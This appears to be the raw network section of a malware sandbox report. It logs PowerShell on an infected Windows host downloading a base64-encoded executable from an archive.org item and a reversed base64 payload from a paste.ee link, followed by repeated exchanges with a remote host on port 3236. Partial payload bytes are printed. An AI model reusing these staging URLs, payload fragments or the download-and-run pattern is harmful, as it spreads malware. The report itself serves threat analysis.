Oct 2, 2024 05:30:17.771558046 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:17.776331902 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:22.777930975 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:22.782788038 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:22.782860041 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:22.787689924 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:22.900839090 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:22.944370985 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:23.028609991 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:23.029452085 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:23.034301996 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:23.034486055 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:23.039293051 CEST	3236	49714	148.113.165.11	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 05:28:15.921647072 CEST	58621	53	192.168.2.6	1.1.1.1
Oct 2, 2024 05:28:16.069677114 CEST	53	58621	1.1.1.1	192.168.2.6
Oct 2, 2024 05:28:19.097764969 CEST	65127	53	192.168.2.6	1.1.1.1
Oct 2, 2024 05:28:19.104898930 CEST	53	65127	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 05:28:15.921647072 CEST	192.168.2.6	1.1.1.1	0x39f2	Standard query (0)	ia600100.us.archive.org	A (IP address)	IN (0x0001)	false
Oct 2, 2024 05:28:19.097764969 CEST	192.168.2.6	1.1.1.1	0x16c	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 05:28:16.069677114 CEST	1.1.1.1	192.168.2.6	0x39f2	No error (0)	ia600100.us.archive.org	207.241.227.240	A (IP address)	IN (0x0001)	false
Oct 2, 2024 05:28:19.104898930 CEST	1.1.1.1	192.168.2.6	0x16c	No error (0)	paste.ee	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 05:28:19.104898930 CEST	1.1.1.1	192.168.2.6	0x16c	No error (0)	paste.ee	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 05:28:23.359803915 CEST	1.1.1.1	192.168.2.6	0x626c	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 05:28:23.359803915 CEST	1.1.1.1	192.168.2.6	0x626c	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ia600100.us.archive.org

paste.ee

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	207.241.227.240	443	2144	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 03:28:16 UTC	109	OUT	GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 Host: ia600100.us.archive.org Connection: Keep-Alive
2024-10-02 03:28:16 UTC	606	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Wed, 02 Oct 2024 03:28:16 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2823512 Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT Connection: close ETag: "66e22cba-2b1558" Strict-Transport-Security: max-age=15724800 Expires: Wed, 02 Oct 2024 09:28:16 GMT Cache-Control: max-age=21600 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With Access-Control-Allow-Credentials: true Accept-Ranges: bytes
2024-10-02 03:28:16 UTC	15778	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
2024-10-02 03:28:16 UTC	16384	IN	Data Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61 Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
2024-10-02 03:28:17 UTC	16384	IN	Data Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41 Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
2024-10-02 03:28:17 UTC	16384	IN	Data Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65 Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
2024-10-02 03:28:17 UTC	16384	IN	Data Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41 Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
2024-10-02 03:28:17 UTC	16384	IN	Data Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
2024-10-02 03:28:17 UTC	16384	IN	Data Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
2024-10-02 03:28:17 UTC	16384	IN	Data Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59 Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
2024-10-02 03:28:17 UTC	16384	IN	Data Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41 Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
2024-10-02 03:28:17 UTC	16384	IN	Data Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43 Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49713	188.114.96.3	443	2144	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 03:28:19 UTC	67	OUT	GET /d/AaTNM/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
2024-10-02 03:28:20 UTC	1206	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 03:28:19 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2F3OrRX3%2Bjw9xiwfvBI0PaNnQF77piGm58frPcfSDsijy5uTM9PeZnfgG9UB2nc8368Hs%2FsnOrh4nPnaRluHkgmVGWgDSRSMbjhBj2d3NfRkNJHUAID%2Bkupzkg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc19a0afcea7d0e-EWR
2024-10-02 03:28:20 UTC	163	IN	Data Raw: 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-10-02 03:28:20 UTC	1369	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-10-02 03:28:20 UTC	1369	IN	Data Raw: 63 6c 42 46 49 73 49 6a 56 79 39 47 64 70 35 32 62 4e 4a 58 5a 51 35 6a 49 7a 64 6d 62 70 52 48 64 6c 4e 31 63 33 39 47 5a 75 6c 32 56 76 59 54 4d 77 49 7a 4c 4a 31 30 55 76 30 32 62 6a 35 43 64 6d 39 32 63 76 4a 33 59 70 31 6d 4c 7a 46 57 62 6c 68 32 59 7a 39 79 4c 36 41 48 64 30 68 6d 49 39 4d 6e 62 73 31 47 65 67 4d 33 63 6c 35 57 5a 79 46 32 64 42 6c 47 63 6b 78 54 43 4a 6f 51 44 2b 55 6d 63 68 64 58 51 70 42 48 5a 76 77 54 5a 31 4a 48 64 2b 49 79 63 6e 35 57 61 30 52 58 5a 54 4e 33 64 76 52 6d 62 70 64 31 4c 31 41 44 4d 79 38 53 53 4e 4e 31 4c 74 39 32 59 75 51 6e 5a 76 4e 33 62 79 4e 57 61 74 35 79 63 68 31 57 5a 6f 4e 32 63 76 38 69 4f 77 52 48 64 6f 4a 53 50 7a 35 47 62 74 68 48 49 6c 4a 58 59 33 46 55 61 77 52 47 50 67 41 43 49 67 41 43 49 4b 30 Data Ascii: clBFIsIjVy9Gdp52bNJXZQ5jIzdmbpRHdlN1c39GZul2VvYTMwIzLJ10Uv02bj5Cdm92cvJ3Yp1mLzFWblh2Yz9yL6AHd0hmI9Mnbs1GegM3cl5WZyF2dBlGckxTCJoQD+UmchdXQpBHZvwTZ1JHd+Iycn5Wa0RXZTN3dvRmbpd1L1ADMy8SSNN1Lt92YuQnZvN3byNWat5ych1WZoN2cv8iOwRHdoJSPz5GbthHIlJXY3FUawRGPgACIgACIK0
2024-10-02 03:28:20 UTC	1073	IN	Data Raw: 67 41 43 49 67 41 43 49 4b 30 67 50 74 30 43 49 34 41 79 63 33 39 47 5a 75 6c 32 56 67 30 53 4c 68 77 44 49 67 41 43 49 67 41 69 43 4e 6f 51 44 2b 30 53 4c 2b 38 43 49 69 30 58 59 7a 6b 6a 5a 31 49 6a 4d 77 51 44 4e 79 45 57 4c 6b 4a 54 5a 34 30 43 5a 69 5a 47 4e 74 59 54 4f 6b 56 54 4c 68 6c 6a 59 34 4d 54 4d 31 4d 7a 65 69 30 44 5a 4a 42 79 55 50 52 57 5a 30 4a 33 62 77 42 58 64 7a 78 54 4c 74 45 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 74 30 43 49 33 41 79 63 33 39 47 5a 75 6c 32 56 67 30 53 4c 68 77 44 49 67 41 43 49 67 41 69 43 4e 6f 51 44 2b 30 53 4c 2b 38 43 49 69 30 48 4d 6d 4e 44 5a 7a 55 57 5a 6c 52 47 4f 77 41 54 4c 6c 5a 57 4e 68 31 53 4e 6a 4e 44 4e 74 59 44 4e 31 45 54 4c 33 55 44 4e 78 45 44 4d 79 55 32 65 69 30 44 5a 4a 42 79 55 50 52 57 Data Ascii: gACIgACIK0gPt0CI4Ayc39GZul2Vg0SLhwDIgACIgAiCNoQD+0SL+8CIi0XYzkjZ1IjMwQDNyEWLkJTZ40CZiZGNtYTOkVTLhljY4MTM1Mzei0DZJByUPRWZ0J3bwBXdzxTLtECPgACIgACIK0gPt0CI3Ayc39GZul2Vg0SLhwDIgACIgAiCNoQD+0SL+8CIi0HMmNDZzUWZlRGOwATLlZWNh1SNjNDNtYDN1ETL3UDNxEDMyU2ei0DZJByUPRW
2024-10-02 03:28:20 UTC	1369	IN	Data Raw: 37 66 66 32 0d 0a 44 2b 49 69 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 76 5a 6d 62 4a 52 33 63 31 4a 48 64 38 41 43 49 4b 30 67 50 76 49 43 63 77 46 6d 4c 75 39 57 61 30 46 32 59 70 78 47 63 77 46 55 65 4e 4a 53 50 6c 31 57 59 75 42 69 49 77 34 79 4e 75 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 32 42 53 65 30 6c 47 64 75 56 47 5a 4a 6c 48 62 69 31 57 5a 7a 4e 58 59 38 41 43 49 4b 30 67 50 69 45 6a 64 75 30 32 63 68 70 54 62 76 4e 57 4c 30 5a 32 62 7a 39 6d 63 6a 6c 57 62 74 4d 58 59 74 56 47 61 6a 4e 6e 4f 75 4a 58 64 69 30 7a 63 75 78 57 62 34 42 69 49 77 34 53 4d 69 30 6a 62 76 6c 32 63 79 56 6d 56 30 4e 58 5a 6d 6c 6d 62 68 31 47 49 Data Ascii: 